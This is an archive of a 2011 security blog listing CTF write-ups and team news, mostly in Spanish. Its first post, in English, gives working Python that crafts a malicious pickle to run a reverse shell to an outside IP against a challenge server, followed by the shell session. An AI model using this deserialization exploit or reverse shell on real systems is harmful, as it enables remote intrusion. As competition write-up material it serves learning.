stuff » Security

CSAW 2011 – Reversing – Python 200

Fernando M — Mon, 26 Sep 2011 06:43:41 +0000

Python – 200 Points

nc csawctf.poly.edu 53080

When we connected to the port it was running a service Haderper:

-----------------------------
| Welcome to Haderper!      |
| Please enter your command |
-----------------------------
> help

Haderper v0.1-alpha

Command help:

help        - this screen
exec        - execute a command
derp        - derp a string
underp      - underp a string
logout/exit - disconnect

> derp hi
UydoaScKcDAKLg==
> underp UydoaScKcDAKLg==
hi
>

If we decode the base64 string we can see that it looks like a Pickle dump file:

$ echo UydoaScKcDAKLg== | base64 -d
S'hi'
p0

After several failed attempts to get a reverse shell or read command output (nc, ls >/dev/tcp, etc) and knowing that the daemon is running on python, we use a reverse shell written in python from reverse shell cheatsheet.

# credits for this code goes to Jeff Epler
import pickle, new, base64

def nasty(module, function, *args):
    return pickle.dumps(new.classobj(function, (), {'__getinitargs__': lambda self, arg = args: arg, '__module__': module}) ())

print "underp "+base64.b64encode(nasty("os", "system", "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.7\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")) 

$ python xpl.py | nc csawctf.poly.edu 53080

And our listening nc gets the remote shell:

$ nc -lp 8080
$ id
uid=1001(quine) gid=1001(quine) groups=1001(quine)
$ cd
$ ls
haderp.py
haderp.pyc
key.txt
$ cat key.txt
key{38d7721de7853c8e385e0ee177e3d15e7a21381bd461a20f631fd1f3048d22db}

Key:38d7721de7853c8e385e0ee177e3d15e7a21381bd461a20f631fd1f3048d22db

You can see the code for the daemon here.

Hack.lu 2011 CTF – Scotty’s last signal Solution

Fernando M — Wed, 21 Sep 2011 22:41:26 +0000

Challenge summary:

Scotty’s last signal

You might have heard about Montgomery Scott, the legendary chief engineer of the U.S.S. Enterprise. What you probably did not know is his passion for Video Games – especially really old classics. We recently lost contact with his transport shuttle and we think you should examine this old game file we recently recieved because he might have just put a message into there. This would make sense if he could not send a fully blown Space-Unicode message signal to avoid attracting any Borg ships in the sector… (Borg usually are very bad at video games) His passion for Beaming and Warping might be of interest for your analysis. https://ctf.hack.lu/files/mario

First we downloaded the attached file and checked to see what kind of file it is.

$ file mario
mario: iNES ROM dump, 2x16k PRG, 1x8k CHR, [Vert.]
$ mv mario mario.nes

iNES Rom is a format developed by Marat Fayzullin to store Nintendo / Famicon games, and it’s also de name of its emulator.

After spending some time playing the game, looking at the dissasembled game using FCEUX debugger and reading about NES ASM, I noted this wasn’t probably the easy way to solve it . But by playing it we could see that some messages on the game were changed, FLUX instead of MARIO, SADFACE instead of GAME OVER.

A couple of Google searching led me to this tool to change strings of SMB rom, SMB NES Rom Text Editor luckily is written in C # and can be run on Linux too with Mono.

Flag: IMSTILLALIVEHELPME

Campus Party Valencia 2011 – Premio ESET

Fernando M — Thu, 15 Sep 2011 06:31:22 +0000

Esta publicación la tenia pendiente hace casi un mes, desde que recibí el premio entregado por ESET a nuestro equipo NULL Life por haber logrado finalizar de primeros el WGSBD2 organizado para Campus Party España. Ya se ha publicado una recopilación de las soluciones WGSBD2 para los que esten interesados.

Las categorias del wargame fueron las siguientes:

Trivial
Networking
Binarios
Crypto
Web

Agradecimientos a Security By Default por un excelente Wargame, a Campus Party España, y por ultimo, pero no menos importante, ESET por patrocinar este tipo de eventos. Sin más preambulo el unboxing del premio, una Macbook Pro 15″ (con ESET Cybersecurity) otorgada por ESET.

WGSBD2 – Campus Party Valencia 2011

Fernando M — Sun, 17 Jul 2011 07:48:10 +0000

Nuestro equipo NULL Life participó en el CTF de SecurityByDefault.com y logró finalizar de primero todos los retos, ademas de obtener el primer lugar por puntos al finalizar el evento

Los miembros del equipo que participaron Daniel (Colombia), g30rg3_x (Mexico), g05u (Perú), emyei (Argentina), Perverths0 (Perú) y snr33 (Perú). Brillo por su ausencia nuestro CISSP, CEH fataku por motivos de su trabajo, o eso dice el xD

Por cierto, esta entrada va desde el iPad obtenida en el CTF de Campus Party Colombia, me la entregaron el dia de ayer, y ya le estamos dando un buen uso. Este ha sido un buen año para NULL Life

CTF Campus Party 2011 Colombia

Fernando M — Fri, 08 Jul 2011 21:44:47 +0000

Este año representé a NULL-Life en el CTF de Campus Party Colombia, logré obtener el primer lugar, el premio fue un magico iPad 2 (que aún no me han entregado, pero la paciencia es la virtud de todo pentester). Les dejo el writeup para que vean la dificultad y solucion de todos los retos.

La próxima semana viene el CTF de Campus Party Valencia, en el cual podremos participar como equipo

¡Agradecimientos a Nonroot y Campus Party por la organización del evento!

PlaidCTF 2011 – Division is HARD!!

Fernando M — Thu, 28 Apr 2011 18:04:33 +0000

Esta vez participamos en el PlaidCTF, organizado por el Plaid Parlament of Pwning. Muchos retos, casi 40 para resolverlos en 2 dias, y con una dificultad considerable.

Obtuvimos la posicion numero 42 con NULL Life, aunque nos faltaba un miembro importante del equipo. Nos ubicamos por encima de los otros equipos Colombianos, el ultimo dia del ctf el equipo RICTeam nos logro empatar, pero teniamos un As bajo la manga y los pudimos dejar abajo faltando 5 minutos para terminar el CTF cuando ya poco podian hacer. Pueden ver la tabla de posiciones completa en el sitio de plaidctf.

Daniel publico la solucion para el reto I’m feeling lucky. Y por mi parte les publicare la solucion para Division is hard, esto para ayudarle a cierto equipo con casi 16 anios de experiencia que no pudo resolverlo (de hecho no resolvio ninguno) :C

«Division is HARD!!»
We found an old document in one of the AED offices. However, the text is distorted. Figure out what the corrupted value is.
1.3337 ~= XXXXXXX/3145727

Buscando en google los dos numeros presentados en el problema, podemos ver de que se trata, el error de hardware coprocesador de floating point que incluian algunos procesadores Pentium (hace 16 anios coincidencialmente ).

http://www.ipsr.ku.edu/stafffil/hoyle/pentium_fdiv/

http://en.wikipedia.org/wiki/Pentium_FDIV_bug

Al realizar la division 4195835/3145727 en un procesador afectado devolvería 1.3337 cuando el resultado correcto es 1,3338. La respuesta del reto era 4195835.

Firefox 3.6.19 Remote Code Execution

Fernando M — Fri, 15 Apr 2011 06:32:08 +0000

To be disclosed soon.

Nuit Du Hack 2011 Prequals

Fernando M — Mon, 11 Apr 2011 04:32:22 +0000

Nuestro equipo NULL Life participó hace un par de semanas en los prequal de CTF Nuit Du Hack. Logramos finalizar en la posición número 12. Este es el ranking final de los prequals:

Entre los equipos que conozco de este top, esta el equipo fail0verflow, es el grupo que encontró la falla de criptografía en el PS3 ! holy cactus son los mismos de int3pids, Leet More, smoked chicken y Rdot.Org equipos rusos con bastante potencial.

Pueden ver un resumen de las prequals en el sitio de HackerzVoice, durante toda la competencia estuvimos entre los primeros equipos. Daniel publicó la lista de retos que se solucionarón y el Write Up del reto forensics 100.

Aca les dejo unos writeups por el equipo 404NameNotF0und para todos los retos del prequal, acompañados del codigo fuente para algunos retos.

Codegate 2011 CTF

Fernando M — Sun, 06 Mar 2011 21:33:26 +0000

Este año lo inauguramos con el CTF de Codegate, retos que nos pusieron a trasnochar dos dias seguidos, pero el resultado no estuvo mal nuestro equipo NULL-Life logro quedar en la posicion 30 de 178 equipos. Observando el resto del ranking, fuimos el primer equipo de latinos, seguidos por un equipo Argentino, KchoTeam en el lugar 69, y otro equipo Colombiano, RICTeam en el lugar 92.

Estos fueron los retos que logramos pasar:

Y este es el rank temporal de las primeras 30 posiciones, (para que las demas? )

El rank completo esta en http://yut.codegate.org/

Proximamente HITB y Defcon 2011

padocon ctf 2011

Fernando M — Thu, 20 Jan 2011 17:44:59 +0000

Esta vez nuestro equipo *NULL Labs logro la posicion 19 de un total de 351 equipos registrados. Todavia nos falta bastante Daniel publicara los writeups pronto.

Me parecio extrano no ver a int3pids en el top pero creo que ellos se enfocaron mas en el ctf de secbydefault.

No pudimos hacer nada para el ctf de securitybydefault por falta de tiempo, pero bueno a quien se le ocurre hacer dos ctf el mismo fin de semana